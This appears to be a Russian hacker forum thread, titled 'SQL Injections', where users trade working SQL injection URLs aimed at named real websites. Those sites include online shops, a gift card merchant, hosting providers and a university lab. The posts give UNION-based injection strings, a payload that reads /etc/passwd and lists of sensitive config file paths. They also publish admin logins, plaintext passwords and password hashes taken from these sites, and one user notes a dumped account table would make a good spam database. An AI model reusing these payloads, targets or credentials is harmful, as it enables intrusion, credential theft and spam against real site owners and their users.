SQL Инъекции

http://www.kulisa.eu/index.php?p=article&id=-1+union+select+1,2,login,password,5,6,7,8+from+users+limit+0,1

LOGIN:admin
PASS:i@srle

http://www.kulisa.eu/admin/

P.S. Очередной беспонтовый ресурс....

 

http://dontime.dn.ua/index.php?new=99998009+union+select+1,2,3,4,concat(user_login,char(58),user_password),6,7,8,9,10,11,12+from+users+limit+0,1/*

 

https://shop.invictusnetworks.com/detail.php?id=-16066+union+select+1,concat_ws(0x3A3a,version(),database()),3,4,5,6,7,8,9,10,11,12/*

4.0.18::estore

 

http://www.webhostinglogic.com/support/faq.php?cat=18+union+select+1,2,3+from+mysql.users/* - какой то хостинг буржуйский
http://ru-hosting.ru/article.php/?sid=999+union+select+1,2,user(),4,5,6/*

 

Lpl.arizona.edu - PR 7
Department of Planetary Sciences and Lunar Laboratory

5 ветка..

таблы..

в базе ниче такого не нашел )

(с) VITAL

 

user(): infosfera@localhost
database(): infosfera
version(): 4.0.24_Debian-10sarge1-log
type db: MSSQL

 

http://business.za.msn.com/msn/view_article.php?id=-1+union+select+1,version(),3,4,5,6,7--

5.1.17-beta

 

http://www.coffeetea.info/ee.php?page=topics&action=showcomments&id=717+AND+ascii(lower(substring(version(),1,1)))=53--
version: 5.*
покопает кто дальше?

 

http://lib.rin.ru/cgi-bin/new.pl?art=-1'+union+select+null,LOAD_FILE('/etc/passwd'),null/*

 

Code:

http://infosfera.sfo.ru/a/articles.php?cat_id=20&id=195+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12+LIMIT+1,1/*

user(): infosfera@localhost
database(): infosfera
version(): 4.0.24_Debian-10sarge1-log
type db: MSSQL

 

Zinus
Вот ещё несколько

/etc/my.cnf
/etc/apache/conf/httpd.conf
/etc/group
/etc/logrotate.d/vsftpd.log

 

Вот скуля от меня:

Code:

http://wow.cybergame.su/index.php?newsid=-25+union+select+1,2,3,concat_ws(char(58),gmlevel,username,char(58),id,char(58),sha_pass_hash,char(58),sessionkey,char(58),v,char(58),s,char(58),email,char(58),joindate,char(58),last_ip,char(58),failed_logins,char(58),locked,char(58),last_login,char(58),online,char(58),tbc,char(58),mutetime,char(58),%20locale,char(58)),5,6+from+account--

P.S:там кста не плохая спам база будет)
---------------------------------
И вот еше одна:

Code:

http://www.cdirani.com/zcat.php?id=-1+union+select+1,2,3,concat_ws(0x3a,id,user,pass),5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+admin/*

Админка:

Code:

http://www.cdirani.com/admin/login.php

Логин/пасс/ид:

Code:

admin:alisobhani:1

Вродь расшифровал,но они почему то не подходят(((

Тут канешно нету спам базы но все же...

 

Gift card merchant

5.0.51a-community

Бд,таблицы,колонки:

Code:

Дампите сами, пятая ж версия (очень много таблиц, сюда не влезут) :) 

Проверяем юзеров на админа:

http://www.theucard.com/master/db_backup.sql -
21метр.
Полезно, если надо будет получить таблицы\поля xcart (как памятка)).Можно посписывать (=

dir'Ы:

Code:

http://www.theucard.com/test/
http://www.theucard.com/master/
http://www.theucard.com/_borders
http://www.theucard.com/_vti_bin
http://www.theucard.com/banners
http://www.theucard.com/cpanel
http://www.theucard.com/documents
http://www.theucard.com/downloads
http://www.theucard.com/files
http://www.theucard.com/gallery
http://www.theucard.com/images
http://www.theucard.com/master
http://www.theucard.com/mobile
http://www.theucard.com/my
http://www.theucard.com/register
http://www.theucard.com/terminal
http://www.theucard.com/test
http://www.theucard.com/webmail
http://www.theucard.com/y

 

http://www.lgtmerchant.com/shop/checkout.php?id=1+AND+substring(version(),1,1)=4/*&goods=6

Шоп.Четвёрочка. Принтабельных нет.

 

http://koleso.topof.ru

Code:

http://koleso.topof.ru/testing_info.php?id=-7+union+select+1,2,3,4,concat_ws(0x3a,admin_login,admin_password),6,7,8+from+admins

news:044e7b0ce67db55376abda253f52e101:1b
tyre:c1d42f7311bfb28391292190c0a7a904:30
disk:10f43033d0b00ecccfc676bb6baa3f8e:64
auto:12794736bba2d6fc3b41e0b013d55178:1a
v.savosin:046a47fda9108dcc3cbd9d9ac0080ab6:84
hadmin:dea6235570ff43527546bfa39b1a7eeb:f6
Админка:

Code:

http://koleso.topof.ru/admin/login.php

 

http://www.profilaktika.ru/index.php?id_mag=35&id_st=659&id_rub=-323+UNION+SELECT+1,concat(0x73716C696E6A666C64,AES_DECRYPT(AES_ENCRYPT(user,0x71),0x71)),3,4,5+FROM+mysql.user/*
http://www.profilaktika.ru/index.php?id_mag=35&id_st=659&id_rub=-323+UNION+SELECT+1,concat(0x73716C696E6A666C64,AES_DECRYPT(AES_ENCRYPT(password,0x71),0x71)),3,4,5+FROM+mysql.user/*


sqlinjfldodno-kashniki:sqlinjfld65204190655dbf01

 

МЭШ — американский сериал

Code:

http://www.4077th.ru/page.php?id=1453+and+1=0+union+select+1,[COLOR=DarkRed]2[/COLOR],3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--

Вывод через ошибку:

От CMS с таблицы Users:

С таблицы administrators:

От форума:

 

В продолжение темы

5.0.45-community

 

http://m.motivepath.com/jabberdemo/merchant-iphone.php?id=-181+union+select+1,concat_ws(0x03a,user,password),3,4,5,6,7+from+mysql.user/*

 

http://realestates-bg.eu/sgrada.php?page=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a3a,user,pass),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58+from+admin+limit+0,1

http://realestates-bg.eu/admin